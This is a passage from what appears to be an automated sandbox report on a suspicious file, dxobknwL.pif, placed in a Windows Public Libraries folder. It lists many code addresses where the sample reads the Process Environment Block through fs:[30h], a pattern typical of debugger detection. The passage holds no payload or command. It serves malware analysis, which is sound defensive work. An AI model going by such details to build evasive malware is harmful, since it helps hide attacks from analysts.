                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0409AD mov eax, dword ptr fs:[00000030h]3_2_2A0409AD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0409AD mov eax, dword ptr fs:[00000030h]3_2_2A0409AD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C89B3 mov esi, dword ptr fs:[00000030h]3_2_2A0C89B3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C89B3 mov eax, dword ptr fs:[00000030h]3_2_2A0C89B3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C89B3 mov eax, dword ptr fs:[00000030h]3_2_2A0C89B3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10A9D3 mov eax, dword ptr fs:[00000030h]3_2_2A10A9D3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D69C0 mov eax, dword ptr fs:[00000030h]3_2_2A0D69C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h]3_2_2A04A9D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0749D0 mov eax, dword ptr fs:[00000030h]3_2_2A0749D0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CE9E0 mov eax, dword ptr fs:[00000030h]3_2_2A0CE9E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0729F9 mov eax, dword ptr fs:[00000030h]3_2_2A0729F9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0729F9 mov eax, dword ptr fs:[00000030h]3_2_2A0729F9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov ecx, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h]3_2_2A06AE00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038E1D mov eax, dword ptr fs:[00000030h]3_2_2A038E1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6E20 mov eax, dword ptr fs:[00000030h]3_2_2A0D6E20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6E20 mov eax, dword ptr fs:[00000030h]3_2_2A0D6E20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6E20 mov ecx, dword ptr fs:[00000030h]3_2_2A0D6E20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112E4F mov eax, dword ptr fs:[00000030h]3_2_2A112E4F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112E4F mov eax, dword ptr fs:[00000030h]3_2_2A112E4F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0E7F mov eax, dword ptr fs:[00000030h]3_2_2A0C0E7F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0E7F mov eax, dword ptr fs:[00000030h]3_2_2A0C0E7F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0E7F mov eax, dword ptr fs:[00000030h]3_2_2A0C0E7F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046E71 mov eax, dword ptr fs:[00000030h]3_2_2A046E71
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03AE90 mov eax, dword ptr fs:[00000030h]3_2_2A03AE90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03AE90 mov eax, dword ptr fs:[00000030h]3_2_2A03AE90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03AE90 mov eax, dword ptr fs:[00000030h]3_2_2A03AE90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072E9C mov eax, dword ptr fs:[00000030h]3_2_2A072E9C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072E9C mov ecx, dword ptr fs:[00000030h]3_2_2A072E9C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCEA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCEA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCEA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DAEB0 mov eax, dword ptr fs:[00000030h]3_2_2A0DAEB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DAEB0 mov eax, dword ptr fs:[00000030h]3_2_2A0DAEB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6ED0 mov ecx, dword ptr fs:[00000030h]3_2_2A0F6ED0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A078EF5 mov eax, dword ptr fs:[00000030h]3_2_2A078EF5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6F00 mov eax, dword ptr fs:[00000030h]3_2_2A0F6F00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042F12 mov eax, dword ptr fs:[00000030h]3_2_2A042F12
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF1F mov eax, dword ptr fs:[00000030h]3_2_2A07CF1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EF28 mov eax, dword ptr fs:[00000030h]3_2_2A06EF28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4F42 mov eax, dword ptr fs:[00000030h]3_2_2A0E4F42
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF50 mov eax, dword ptr fs:[00000030h]3_2_2A07CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0F50 mov eax, dword ptr fs:[00000030h]3_2_2A0E0F50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2F60 mov eax, dword ptr fs:[00000030h]3_2_2A0E2F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2F60 mov eax, dword ptr fs:[00000030h]3_2_2A0E2F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AF69 mov eax, dword ptr fs:[00000030h]3_2_2A06AF69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AF69 mov eax, dword ptr fs:[00000030h]3_2_2A06AF69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114F68 mov eax, dword ptr fs:[00000030h]3_2_2A114F68
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF80 mov eax, dword ptr fs:[00000030h]3_2_2A07CF80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072F98 mov eax, dword ptr fs:[00000030h]3_2_2A072F98
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072F98 mov eax, dword ptr fs:[00000030h]3_2_2A072F98
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114FE7 mov eax, dword ptr fs:[00000030h]3_2_2A114FE7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6FF7 mov eax, dword ptr fs:[00000030h]3_2_2A0F6FF7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4C0F mov eax, dword ptr fs:[00000030h]3_2_2A0C4C0F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CC00 mov eax, dword ptr fs:[00000030h]3_2_2A07CC00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EC20 mov eax, dword ptr fs:[00000030h]3_2_2A03EC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DCC20 mov eax, dword ptr fs:[00000030h]3_2_2A0DCC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DCC20 mov eax, dword ptr fs:[00000030h]3_2_2A0DCC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov ecx, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074C59 mov eax, dword ptr fs:[00000030h]3_2_2A074C59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038C8D mov eax, dword ptr fs:[00000030h]3_2_2A038C8D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov ecx, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068CB1 mov eax, dword ptr fs:[00000030h]3_2_2A068CB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068CB1 mov eax, dword ptr fs:[00000030h]3_2_2A068CB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CCC8 mov eax, dword ptr fs:[00000030h]3_2_2A03CCC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038CD0 mov eax, dword ptr fs:[00000030h]3_2_2A038CD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074D1D mov eax, dword ptr fs:[00000030h]3_2_2A074D1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F8D10 mov eax, dword ptr fs:[00000030h]3_2_2A0F8D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F8D10 mov eax, dword ptr fs:[00000030h]3_2_2A0F8D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114D30 mov eax, dword ptr fs:[00000030h]3_2_2A114D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8D20 mov eax, dword ptr fs:[00000030h]3_2_2A0C8D20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D8D6B mov eax, dword ptr fs:[00000030h]3_2_2A0D8D6B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A076DA0 mov eax, dword ptr fs:[00000030h]3_2_2A076DA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov ecx, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov eax, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov eax, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068DBF mov eax, dword ptr fs:[00000030h]3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068DBF mov eax, dword ptr fs:[00000030h]3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114DAD mov eax, dword ptr fs:[00000030h]3_2_2A114DAD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108DAE mov eax, dword ptr fs:[00000030h]3_2_2A108DAE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108DAE mov eax, dword ptr fs:[00000030h]3_2_2A108DAE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EDD3 mov eax, dword ptr fs:[00000030h]3_2_2A06EDD3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EDD3 mov eax, dword ptr fs:[00000030h]3_2_2A06EDD3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4DD7 mov eax, dword ptr fs:[00000030h]3_2_2A0C4DD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4DD7 mov eax, dword ptr fs:[00000030h]3_2_2A0C4DD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060DE1 mov eax, dword ptr fs:[00000030h]3_2_2A060DE1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CDEA mov eax, dword ptr fs:[00000030h]3_2_2A03CDEA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CDEA mov eax, dword ptr fs:[00000030h]3_2_2A03CDEA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036DF6 mov eax, dword ptr fs:[00000030h]3_2_2A036DF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06CDF0 mov eax, dword ptr fs:[00000030h]3_2_2A06CDF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06CDF0 mov ecx, dword ptr fs:[00000030h]3_2_2A06CDF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0DF0 mov eax, dword ptr fs:[00000030h]3_2_2A0E0DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0DF0 mov eax, dword ptr fs:[00000030h]3_2_2A0E0DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03823B mov eax, dword ptr fs:[00000030h]3_2_2A03823B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11625D mov eax, dword ptr fs:[00000030h]3_2_2A11625D
